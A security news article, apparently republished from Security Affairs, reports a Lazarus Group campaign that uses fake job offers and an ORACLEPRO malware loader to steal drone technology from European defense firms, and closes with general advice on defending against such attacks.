North Korean Hackers Target European Defense Firms to Steal Drone Secrets
A sophisticated cyber espionage campaign is actively targeting European aerospace and defense companies, with the primary goal of stealing sensitive military technology, particularly related to unmanned aerial vehicles (UAVs). This operation has been attributed to the Lazarus Group, a notorious state-sponsored hacking collective with established ties to North Korea.
The attacks demonstrate a calculated and persistent effort to acquire advanced technical data, blueprints, and strategic intelligence from some of the world’s leading defense contractors. By focusing on the UAV sector, the campaign highlights the critical importance of drone technology in modern warfare and intelligence gathering.
The Attack Method: Deceptive Job Offers
The primary infiltration method relies on highly targeted social engineering. The attackers have adopted a well-honed tactic of impersonating legitimate recruiters from major defense and technology firms, including BAE Systems, General Dynamics, and Northrop Grumman.
The process typically begins on professional networking platforms like LinkedIn, where attackers identify and approach employees with specific, desirable skill sets. After making initial contact, they lure the target away from the platform to encrypted messaging apps like WhatsApp or Slack, under the guise of continuing the recruitment process.
Key to this strategy is the attackers’ use of fake, yet convincing, job offers. They present malicious documents disguised as detailed job descriptions or assessments. Once the victim opens the file, the infection process begins, establishing a hidden backdoor into the company’s network.
A New Weapon in the Arsenal: ORACLEPRO Malware
This campaign is distinguished by the use of a newly identified malware loader named ORACLEPRO. This piece of software acts as the initial foothold for the attackers, designed to be stealthy and effective at bypassing initial security layers.
When a victim opens the malicious document—often a LNK file masquerading as a PDF—it executes a script that downloads and runs the ORACLEPRO loader. The malware is designed to perform a critical function: it establishes a connection with a command-and-control (C2) server operated by the hackers. From there, it can download and install additional, more powerful malware designed for data theft, network reconnaissance, and long-term persistence.
The malware cleverly bypasses User Account Control (UAC) security prompts to operate with elevated permissions. This technique allows it to execute commands and install subsequent payloads without triggering standard security warnings that might alert the user or IT staff to the intrusion.
The Strategic Goal: Acquiring Advanced Military Technology
The focus on aerospace and defense firms is not random. It represents a clear state-sponsored objective to bridge technology gaps by stealing intellectual property rather than investing in years of expensive research and development.
This campaign is a clear indicator of efforts to advance North Korea’s own military capabilities, particularly in the realm of UAVs. By stealing cutting-edge designs and operational data, the nation can accelerate its drone program for both surveillance and combat purposes, posing a significant geopolitical and security risk. The theft of such information undermines the technological superiority of European nations and their allies.
How to Defend Against These Sophisticated Attacks
The defense industry remains a high-value target for state-sponsored espionage. Protecting against these threats requires a multi-layered security approach combining technology, processes, and employee education.
Heighten Employee Awareness: Train employees to recognize the signs of social engineering. Be extremely cautious of unsolicited job offers, especially those that quickly attempt to move the conversation to personal messaging apps. Verify the recruiter’s identity through official company channels before sharing any information.
Scrutinize All Documents: Never open attachments or click links from unverified sources. Configure systems to show full file extensions to help identify disguised malicious files (e.g.,
Job_Offer.pdf.lnk).Disable Macros: Implement a policy to disable macros from running in Microsoft Office documents originating from the internet. The vast majority of malware delivered via documents relies on macros for execution.
Implement Advanced Endpoint Security: Use a robust Endpoint Detection and Response (EDR) solution. These tools are designed to detect and block the suspicious behaviors exhibited by malware like ORACLEPRO, such as unusual process execution or C2 communications.
Enforce Application Control: Use application whitelisting tools to prevent unauthorized or unknown executables from running on company workstations and servers.
The Lazarus Group continues to evolve its tactics, demonstrating a high level of sophistication and persistence. For organizations in the defense sector, maintaining a constant state of vigilance and implementing proactive security measures is not just a best practice—it is an operational necessity.
Source: https://securityaffairs.com/183783/apt/lazarus-targets-european-defense-firms-in-uav-themed-operation-dreamjob.html
